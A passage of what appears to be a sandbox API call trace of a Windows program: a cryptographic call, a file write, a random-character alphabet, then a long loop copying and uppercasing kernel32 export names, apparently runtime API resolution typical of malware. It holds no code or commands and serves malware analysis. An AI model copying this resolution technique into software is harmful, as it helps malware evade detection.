(in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.678] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.679] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.679] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.680] CloseHandle (hObject=0x42c) returned 1 [0087.680] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.680] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.680] CloseHandle (hObject=0x0) returned 0 [0087.680] CloseHandle (hObject=0x428) returned 1 [0087.680] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.681] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.681] GetTickCount () returned 0x114e5cd [0087.681] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.681] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.681] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.681] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.682] lstrlenA (lpString="kernel32.dll") returned 12 [0087.682] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.682] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.682] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.682] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.682] lstrlenA (lpString="ADDATOMA") returned 8 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.682] lstrlenA (lpString="ADDATOMW") returned 8 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.682] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.682] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.682] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.682] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.682] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.683] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.683] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.683] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.683] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.683] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.683] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.683] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.683] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.683] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.683] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.683] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.683] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.683] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.683] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.683] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.684] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.684] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.684] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.684] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.684] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.684] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.684] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.684] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.684] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.684] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.684] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.684] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.684] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.684] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.684] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.685] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.685] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.685] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.685] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.685] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.685] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.685] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.685] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.685] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.685] lstrlenA (lpString="BEEP") returned 4 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.685] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.685] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.685] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.685] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.685] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.685] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.686] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.686] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.686] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.686] lstrlenA (lpString="CANCELIO") returned 8 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.686] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.686] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.686] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.686] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.686] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.686] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.686] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.686] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.686] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.686] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.686] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.686] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.686] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.687] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.687] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.687] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.687] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.687] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.687] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.687] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.687] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.687] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.687] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.687] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.687] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.687] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.687] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.688] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.688] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.688] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.688] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.688] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.688] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.688] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.688] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.688] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.688] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.688] lstrlenA (lpString="COPYCONTEXT") returned 11 